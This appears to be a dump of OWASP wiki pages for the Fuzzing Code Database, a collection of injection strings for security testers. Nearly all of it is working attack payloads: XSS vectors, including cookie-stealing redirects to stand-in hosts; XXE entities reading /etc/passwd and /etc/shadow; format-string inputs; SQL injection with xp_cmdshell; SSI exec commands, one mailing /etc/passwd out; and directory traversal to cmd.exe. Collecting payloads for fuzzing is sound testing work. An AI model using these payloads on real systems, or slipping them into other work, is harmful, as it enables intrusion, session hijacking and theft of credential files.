"&lt;LINK REL=""stylesheet"" HREF=""javascript:alert('XSS');""&gt;"<br />
"&lt;LINK REL=""stylesheet"" HREF=""http://ha.ckers.org/xss.css""&gt;"<br />
&lt;STYLE&gt;@import'http://ha.ckers.org/xss.css';&lt;/STYLE&gt;<br />
"&lt;META HTTP-EQUIV=""Link"" Content=""&lt;http://ha.ckers.org/xss.css&gt;; REL=stylesheet""&gt;"<br />
"&lt;STYLE&gt;BODY{-moz-binding:url(""http://ha.ckers.org/xssmoz.xml#xss"")}&lt;/STYLE&gt;"<br />
"&lt;XSS STYLE=""behavior: url(xss.htc);""&gt;"<br />
"&lt;STYLE&gt;li {list-style-image: url(""javascript:alert('XSS')"");}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS"<br />
"&lt;IMG SRC='vbscript:msgbox(""XSS"")'&gt;"<br />
¼script¾alert(¢XSS¢)¼/script¾<br />
"&lt;META HTTP-EQUIV=""refresh"" CONTENT=""0;url=javascript:alert('XSS');""&gt;"<br />
"&lt;META HTTP-EQUIV=""refresh"" CONTENT=""0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K""&gt;"<br />
"&lt;META HTTP-EQUIV=""refresh"" CONTENT=""0; URL=http://;URL=javascript:alert('XSS');""&gt;"<br />
"&lt;IFRAME SRC=""javascript:alert('XSS');""&gt;&lt;/IFRAME&gt;"<br />
"&lt;FRAMESET&gt;&lt;FRAME SRC=""javascript:alert('XSS');""&gt;&lt;/FRAMESET&gt;"<br />
"&lt;TABLE BACKGROUND=""javascript:alert('XSS')""&gt;"<br />
"&lt;TABLE&gt;&lt;TD BACKGROUND=""javascript:alert('XSS')""&gt;"<br />
"&lt;DIV STYLE=""background-image: url(javascript:alert('XSS'))""&gt;"<br />
"&lt;DIV STYLE=""background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029""&gt;"<br />
"&lt;DIV STYLE=""background-image: url(&amp;#1;javascript:alert('XSS'))""&gt;"<br />
"&lt;DIV STYLE=""width: expression(alert('XSS'));""&gt;"<br />
"&lt;STYLE&gt;@im\port'\ja\vasc\ript:alert(""XSS"")';&lt;/STYLE&gt;"<br />
"&lt;IMG STYLE=""xss:expr/*XSS*/ession(alert('XSS'))""&gt;"<br />
"&lt;XSS STYLE=""xss:expression(alert('XSS'))""&gt;"<br />
"exp/*&lt;A STYLE='no\xss:noxss(""*//*"");xss:ex/*XSS*//*/*/pression(alert(""XSS""))'&gt;"<br />
"&lt;STYLE TYPE=""text/javascript""&gt;alert('XSS');&lt;/STYLE&gt;"<br />
"&lt;STYLE&gt;.XSS{background-image:url(""javascript:alert('XSS')"");}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;"<br />
"&lt;STYLE type=""text/css""&gt;BODY{background:url(""javascript:alert('XSS')"")}&lt;/STYLE&gt;"<br />
&lt;!--[if gte IE 4]&gt;&lt;SCRIPT&gt;alert('XSS');&lt;/SCRIPT&gt;&lt;![endif]--&gt;<br />
"&lt;BASE HREF=""javascript:alert('XSS');//""&gt;"<br />
"&lt;OBJECT TYPE=""text/x-scriptlet"" DATA=""http://ha.ckers.org/scriptlet.html""&gt;&lt;/OBJECT&gt;"<br />
&lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript:alert('XSS')&gt;&lt;/OBJECT&gt;<br />
"&lt;EMBED SRC=""http://ha.ckers.org/xss.swf"" AllowScriptAccess=""always""&gt;&lt;/EMBED&gt;"<br />
"&lt;EMBED SRC=""data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg=="" type=""image/svg+xml"" AllowScriptAccess=""always""&gt;&lt;/EMBED&gt;"<br />
"&lt;HTML xmlns:xss&gt;&lt;?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc""&gt;&lt;xss:xss&gt;XSS&lt;/xss:xss&gt;&lt;/HTML&gt;"<br />
"&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;IMG SRC=""javas]]&gt;&lt;![CDATA[cript:alert('XSS');""&gt;]]&gt;&lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;"<br />
"&lt;XML ID=""xss""&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=""javas&lt;!-- --&gt;cript:alert('XSS')""&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;&lt;SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""&gt;&lt;/SPAN&gt;"<br />
"&lt;XML SRC=""xsstest.xml"" ID=I&gt;&lt;/XML&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;"<br />
"&lt;HTML&gt;&lt;BODY&gt;&lt;?xml:namespace prefix=""t"" ns=""urn:schemas-microsoft-com:time""&gt;&lt;?import namespace=""t"" implementation=""#default#time2""&gt;&lt;t:set attributeName=""innerHTML"" to=""XSS&lt;SCRIPT DEFER&gt;alert(""XSS"")&lt;/SCRIPT&gt;""&gt;&lt;/BODY&gt;&lt;/HTML&gt;"<br />
"&lt;SCRIPT SRC=""http://ha.ckers.org/xss.jpg""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;!--#exec cmd=""/bin/echo '&lt;SCR'""--&gt;&lt;!--#exec cmd=""/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;'""--&gt;"<br />
"&lt;? echo('&lt;SCR)';echo('IPT&gt;alert(""XSS"")&lt;/SCRIPT&gt;');&nbsp;?&gt;"<br />
"&lt;META HTTP-EQUIV=""Set-Cookie"" Content=""USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;""&gt;"<br />
"&lt;HEAD&gt;&lt;META HTTP-EQUIV=""CONTENT-TYPE"" CONTENT=""text/html; charset=UTF-7""&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-"<br />
"&lt;SCRIPT a=""&gt;"" SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;SCRIPT =""&gt;"" SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;SCRIPT a=""&gt;"" '' SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;SCRIPT ""a='&gt;'"" SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;SCRIPT a=`&gt;` SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;SCRIPT a=""&gt;'&gt;"" SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;SCRIPT&gt;document.write(""&lt;SCRI"");&lt;/SCRIPT&gt;PT SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;A HREF=""http://66.102.7.147/""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""http://1113982867/""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""http://0x42.0x0000066.0x7.0x93/""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""http://0102.0146.0007.00000223/""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""h\ntt\tp://6"<br />
"&lt;A HREF=""//www.google.com/""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""//google""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""http://google.com/""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""http://www.google.com./""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""javascript:document.location='http://www.google.com/'""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""http://www.gohttp://www.google.com/ogle.com/""&gt;XSS&lt;/A&gt;"<br />
"&lt;div onmouseover=""document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;img src=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;input type=""image"" dynsrc=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;bgsound src=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&amp;{document.write(""XSS-XSS-XSS"");};"<br />
"&lt;img src=&amp;{document.write(""XSS-XSS-XSS"");};&gt;"<br />
"&lt;link rel=""stylesheet"" href=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;iframe src=""vbscript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;img src=""livescript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;a href=""about:&lt;script&gt;document.write(""XSS-XSS-XSS"");&lt;/script&gt;""&gt;"<br />
"&lt;meta http-equiv=""refresh"" content=""0;url=javascript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;body onload=""document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;div style=""background-image: url(javascript:document.write(""XSS-XSS-XSS""););""&gt;"<br />
"&lt;div style=""behaviour: url([link to code]);""&gt;"<br />
"&lt;div style=""binding: url([link to code]);""&gt;"<br />
"&lt;div style=""width: expression(document.write(""XSS-XSS-XSS""););""&gt;"<br />
"&lt;style type=""text/javascript""&gt;document.write(""XSS-XSS-XSS"");&lt;/style&gt;"<br />
"&lt;object classid=""clsid:..."" codebase=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;style&gt;&lt;!--&lt;/style&gt;&lt;script&gt;document.write(""XSS-XSS-XSS"");//--&gt;&lt;/script&gt;"<br />
"&lt;![CDATA[&lt;!--]]&gt;&lt;script&gt;document.write(""XSS-XSS-XSS"");//--&gt;&lt;/script&gt;"<br />
"&lt;&lt;script&gt;document.write(""XSS-XSS-XSS"");&lt;/script&gt;"<br />
"&lt;img src=""blah""onmouseover=""document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;img src=""blah&gt;"" onmouseover=""document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;div datafld=""b"" dataformatas=""html"" datasrc=""#X""&gt;&lt;/div&gt;"<br />
"&lt;a href=""javascript#document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;img dynsrc=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&amp;&lt;script&gt;document.write(""XSS-XSS-XSS"");&lt;/script&gt;"<br />
"&lt;img src=""mocha:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;div style=""binding: url([link to code]);""&gt; [Mozilla]"<br />
"&lt;!-- -- --&gt;&lt;script&gt;document.write(""XSS-XSS-XSS"");&lt;/script&gt;&lt;!-- -- --&gt;"<br />
"&lt;xml src=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;xml id=""X""&gt;&lt;a&gt;&lt;b&gt;&lt;script&gt;document.write(""XSS-XSS-XSS"");&lt;/script&gt;;&lt;/b&gt;&lt;/a&gt;&lt;/xml&gt;"<br />
"[\xC0][\xBC]script&gt;document.write(""XSS-XSS-XSS"");[\xC0][\xBC]/script&gt;"<br />
&gt;&lt;script&gt;<br />
"&lt;script&gt;alert(""WXSS"")&lt;/script&gt;"<br />
"&lt;&lt;script&gt;alert(""WXSS"");//&lt;&lt;/script&gt;"<br />
&lt;script&gt;alert(document.cookie)&lt;/script&gt;<br />
'&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;<br />
'&gt;&lt;script&gt;alert(document.cookie);&lt;/script&gt;<br />
"%3cscript%3ealert(""WXSS"");%3c/script%3e"<br />
%3cscript%3ealert(document.cookie);%3c%2fscript%3e<br />
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E<br />
&amp;ltscript&amp;gtalert(document.cookie);&lt;/script&gt;<br />
&amp;ltscript&amp;gtalert(document.cookie);&amp;ltscript&amp;gtalert<br />
&lt;xss&gt;&lt;script&gt;alert('WXSS')&lt;/script&gt;&lt;/vulnerable&gt;<br />
&lt;IMG%20SRC='javascript:alert(document.cookie)'&gt;<br />
"&lt;IMG%20SRC=""javascript:alert('WXSS');""&gt;"<br />
"&lt;IMG%20SRC=""javascript:alert('WXSS')"""<br />
&lt;IMG%20SRC=JaVaScRiPt:alert('WXSS')&gt;<br />
&lt;IMG%20SRC=javascript:alert("WXSS")&gt;<br />
"&lt;IMG%20SRC=`javascript:alert(""'WXSS'"")`&gt;"<br />
"&lt;IMG%20""""""&gt;&lt;SCRIPT&gt;alert(""WXSS"")&lt;/SCRIPT&gt;""&gt;"<br />
&lt;IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))&gt;<br />
&lt;IMG%20SRC='javasc<br />
"&lt;IMG%20SRC=""jav"<br />
"&lt;IMG%20SRC=""jav ascript:alert('WXSS');""&gt;"<br />
"&lt;IMG%20SRC=""jav<br />
ascript:alert('WXSS');""&gt;"<br />
"&lt;IMG%20SRC=""jav<br />
ascript:alert('WXSS');""&gt;"<br />
"&lt;IMG%20SRC=""%20&amp;#14;%20javascript:alert('WXSS');""&gt;"<br />
"&lt;IMG%20DYNSRC=""javascript:alert('WXSS')""&gt;"<br />
"&lt;IMG%20LOWSRC=""javascript:alert('WXSS')""&gt;"<br />
&lt;IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'&gt;<br />
&lt;IMG%20SRC=javascript:alert('XSS')&gt;<br />
&lt;IMG%20SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041&gt;<br />
&lt;IMG%20SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;<br />
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E<br />
"&gt;&lt;script&gt;document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie&lt;/script&gt;<br />
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E<br />
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//&gt;&lt;/SCRIPT&gt;!--&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;=&amp;{}<br />
'';!--&lt;XSS&gt;=&amp;{()}"<br />
</pre> <br />
<br><br />
<br />
=== XML Attacks - (Update: 11 August 2009 - Total Statements: 15) ===<br />
<pre>Statements<br />
count(/child::node())<br />
x' or name()='username' or 'x'='y<br />
&lt;name&gt;','')); phpinfo(); exit;/*&lt;/name&gt;<br />
&lt;![CDATA[&lt;script&gt;var n=0;while(true){n++;}&lt;/script&gt;]]&gt;<br />
&lt;![CDATA[&lt;]]&gt;SCRIPT&lt;![CDATA[&gt;]]&gt;alert('XSS');&lt;![CDATA[&lt;]]&gt;/SCRIPT&lt;![CDATA[&gt;]]&gt;<br />
"&lt;?xml version=""1.0"" encoding=""ISO-8859-1""?&gt;&lt;foo&gt;&lt;![CDATA[&lt;]]&gt;SCRIPT&lt;![CDATA[&gt;]]&gt;alert('XSS');&lt;![CDATA[&lt;]]&gt;/SCRIPT&lt;![CDATA[&gt;]]&gt;&lt;/foo&gt;"<br />
"&lt;?xml version=""1.0"" encoding=""ISO-8859-1""?&gt;&lt;foo&gt;&lt;![CDATA[' or 1=1 or ''=']]&gt;&lt;/foo&gt;"<br />
"&lt;?xml version=""1.0"" encoding=""ISO-8859-1""?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM ""file://c:/boot.ini""&gt;]&gt;&lt;foo&gt;&amp;xxe;&lt;/foo&gt;"<br />
"&lt;?xml version=""1.0"" encoding=""ISO-8859-1""?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM ""file:////etc/passwd""&gt;]&gt;&lt;foo&gt;&amp;xxe;&lt;/foo&gt;"<br />
"&lt;?xml version=""1.0"" encoding=""ISO-8859-1""?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM ""file:////etc/shadow""&gt;]&gt;&lt;foo&gt;&amp;xxe;&lt;/foo&gt;"<br />
"&lt;?xml version=""1.0"" encoding=""ISO-8859-1""?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM ""file:////dev/random""&gt;]&gt;&lt;foo&gt;&amp;xxe;&lt;/foo&gt;"<br />
"&lt;xml ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;IMG SRC=""javas]]&gt;&lt;![CDATA[cript:alert('XSS');""&gt;]]&gt;"<br />
"&lt;xml ID=""xss""&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=""javas&lt;!-- --&gt;cript:alert('XSS')""&gt;&lt;/B&gt;&lt;/I&gt;&lt;/xml&gt;&lt;SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""&gt;&lt;/SPAN&gt;&lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;"<br />
"&lt;xml SRC=""xsstest.xml"" ID=I&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;"<br />
"&lt;HTML xmlns:xss&gt;&lt;?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc""&gt;&lt;xss:xss&gt;XSS&lt;/xss:xss&gt;&lt;/HTML&gt;"<br />
</pre> <br />
=== Format String Statements - (Update: xx/xx/xx - Total Statements: 28) ===<br />
<pre>%s%p%x%d<br />
.1024d<br />
%.2049d<br />
%p%p%p%p<br />
%x%x%x%x<br />
%d%d%d%d<br />
%s%s%s%s<br />
%99999999999s<br />
%08x<br />
%%20d<br />
%%20n<br />
%%20x<br />
%%20s<br />
%s%s%s%s%s%s%s%s%s%s<br />
%p%p%p%p%p%p%p%p%p%p<br />
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%<br />
f(x)=%s x 123<br />
f(x)=%x x 255<br />
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x<br />
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s<br />
XXXXX.%p<br />
XXXXX`perl -e 'print ".%p" x 80'`<br />
`perl -e 'print ".%p" x 80'`%n<br />
%08x.%08x.%08x.%08x.%08x\n<br />
XXX0_%08x.%08x.%08x.%08x.%08x\n<br />
%.16705u%2\$hn<br />
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|<br />
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id &gt; /tmp/file; exit;<br />
</pre> <br />
==== Project Contributor ====<br />
<br />
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']] <br />
<br />
Reviewer: [[:User:eneves|'''Eduardo Neves''']] <br />
<br />
Contributor: [[:User:ulisses.castro|'''Ulisses Castro''']] [[:User:Adam.muntner|'''Adam Muntner''']] <br />
<br />
==== Feedback and Participation ====<br />
<br />
We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org <br />
<br />
==== Project Identification ====<br />
<br />
{{Template:OWASP Project Identification Tab<br />
| project_name = OWASP Fuzzing Code Database<br />
| project_description = <br />
| leader_name = Wagner Elias<br />
| leader_email = <br />
| leader_username = Wagner.elias<br />
| maintainer_name = <br />
| maintainer_email = <br />
| maintainer_username = <br />
| contributor_name1 = <br />
| contributor_email1 = <br />
| contributor_username1 = <br />
| contributor_name2 = <br />
| contributor_email2 = <br />
| contributor_username2 = <br />
| contributor_name3 = <br />
| contributor_email3 = <br />
| contributor_username3 = <br />
| contributor_name4 = <br />
| contributor_email4 = <br />
| contributor_username4 = <br />
| contributor_name5 = <br />
| contributor_email5 = <br />
| contributor_username5 = <br />
| contributor_name6 = <br />
| contributor_email6 = <br />
| contributor_username6 = <br />
| contributor_name7 = <br />
| contributor_email7 = <br />
| contributor_username7 = <br />
| contributor_name8 = <br />
| contributor_email8 = <br />
| contributor_username8 = <br />
| contributor_name9 = <br />
| contributor_email9 = <br />
| contributor_username9 = <br />
| contributor_name10 = <br />
| contributor_email10 = <br />
| contributor_username10 = <br />
| pamphlet_link = <br />
| mailing_list_name = owasp-fuzzing-code-database<br />
| links_url1 = <br />
| links_name1 = <br />
| links_url2 = <br />
| links_name2 = <br />
| links_url3 = <br />
| links_name3 = <br />
| links_url4 = <br />
| links_name4 = <br />
| links_url5 = <br />
| links_name5 = <br />
| links_url6 = <br />
| links_name6 = <br />
| links_url7 = <br />
| links_name7 = <br />
| links_url8 = <br />
| links_name8 = <br />
| links_url9 = <br />
| links_name9 = <br />
| links_url10 = <br />
| links_name10 = <br />
| project_road_map =<br />
| project_health_status = <br />
| current_release_name = <br />
| current_release_date = <br />
| current_release_download_link = <br />
| current_release_rating = <br />
| current_release_leader_name = <br />
| current_release_leader_email = <br />
| current_release_leader_username = <br />
| last_reviewed_release_name = <br />
| last_reviewed_release_date = <br />
| last_reviewed_release_download_link = <br />
| last_reviewed_release_rating = <br />
| last_reviewed_release_leader_name = <br />
| last_reviewed_release_leader_email = <br />
| last_reviewed_release_leader_username = <br />
| old_release_name1 = <br />
| old_release_date1 = <br />
| old_release_download_link1 = <br />
| old_release_name2 = <br />
| old_release_date2 = <br />
| old_release_download_link2 = <br />
| old_release_name3 = <br />
| old_release_date3 = <br />
| old_release_download_link3 = <br />
| old_release_name4 = <br />
| old_release_date4 = <br />
| old_release_download_link4 = <br />
| old_release_name5 = <br />
| old_release_date5 = <br />
| old_release_download_link5 = <br />
}} __NOTOC__ <headertabs /> <br />
<br />
[[Category:OWASP_Project|Fuzzing Code Database]] [[Category:OWASP_Document]] [[Category:OWASP_Alpha_Quality_Document]]</div>
Foobar23
https://wiki.owasp.org/index.php?title=Category_talk:OWASP_Fuzzing_Code_Database&diff=67535
Category talk:OWASP Fuzzing Code Database
2009-08-12T18:20:22Z
<p>Foobar23: </p>
<hr />
<div>Regarding: Contributors <br/><br />
Would you please add me to the contributors cause I initiated this project in the past and added a lot of code.<br/><br />
Name: Florian Roth<br/><br />
[[User:Foobar23|Foobar23]] 18:20, 12 August 2009 (UTC)</div>
Foobar23
https://wiki.owasp.org/index.php?title=Category_talk:OWASP_Fuzzing_Code_Database&diff=67534
Category talk:OWASP Fuzzing Code Database
2009-08-12T18:17:21Z
<p>Foobar23: Created page with 'Contributors: Would you please add me to the contributors cause I initiated this project in the past and added a lot of code. Name: Florian Roth'</p>
<hr />
<div>Contributors:<br />
Would you please add me to the contributors cause I initiated this project in the past and added a lot of code.<br />
Name: Florian Roth</div>
Foobar23
https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&diff=28942
Category:OWASP Fuzzing Code Database
2008-05-06T15:44:58Z
<p>Foobar23: </p>
<hr />
<div>This database is a collection of several statements used in code injection software. All to often security professionals use their own repositories of statements collected from several projects for a long time. We want to collect all these statements - compose them - merging the database of several projects like [[WebScarab]] and [[JBroFuzz]] gaining a big dataset of effective statements to provide better testing results.<br />
Please add your own statements and check the statements already added. <br />
<br />
=== SQL Injection Statements ===<br />
<br />
<pre><br />
'sqlvuln<br />
'+sqlvuln<br />
sqlvuln;<br />
(sqlvuln)<br />
a' or 1=1--<br />
a" or 1=1--<br />
" or "a" = "a<br />
a' or 'a' = 'a<br />
1 or 1=1<br />
a' waitfor delay '0:0:10'--<br />
1 waitfor delay '0:0:10'--<br />
declare @q nvarchar (4000) select @q =<br />
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A<br />
0<br />
031003000270000<br />
declare @s varchar(22) select @s =<br />
0x77616974666F722064656C61792027303A303A31302700 exec(@s)<br />
declare @q nvarchar (4000) select @q =<br />
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)<br />
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e<br />
exec(@s)<br />
a'<br />
?<br />
' or 1=1<br />
‘ or 1=1 --<br />
x' AND userid IS NULL; --<br />
x' AND email IS NULL; --<br />
anything' OR 'x'='x<br />
x' AND 1=(SELECT COUNT(*) FROM tabname); --<br />
x' AND members.email IS NULL; --<br />
x' OR full_name LIKE '%Bob%<br />
23 OR 1=1<br />
'; exec master..xp_cmdshell 'ping 172.10.1.255'--<br />
</pre><br />
<br />
=== SSI (Server Side Includes) Statements ===<br />
<br />
<pre><br />
<!--#exec cmd="/bin/ls /" --><br/><br />
<!--#exec cmd="cat /etc/passwd" --><br/><br />
<!--#exec cmd="find / -name *.* -print" --><br/><br />
<!--#exec cmd="mail Foobar@email.de <mailto:Foobar@email.de> < cat /etc/passwd" --><br/><br />
</pre><br />
<br />
=== Directory Traversal Statements ===<br />
<br />
<pre><br />
\..\WINDOWS\win.ini<br />
\..\..\WINDOWS\win.ini<br />
\..\..\..\WINDOWS\win.ini<br />
\..\..\..\..\WINDOWS\win.ini<br />
\..\..\..\..\..\WINDOWS\win.ini<br />
\..\..\..\..\..\..\WINDOWS\win.ini<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
